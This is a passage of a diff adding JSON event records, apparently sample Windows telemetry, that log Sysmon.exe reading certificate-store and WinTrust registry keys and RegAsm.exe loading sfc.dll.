"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867930000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": 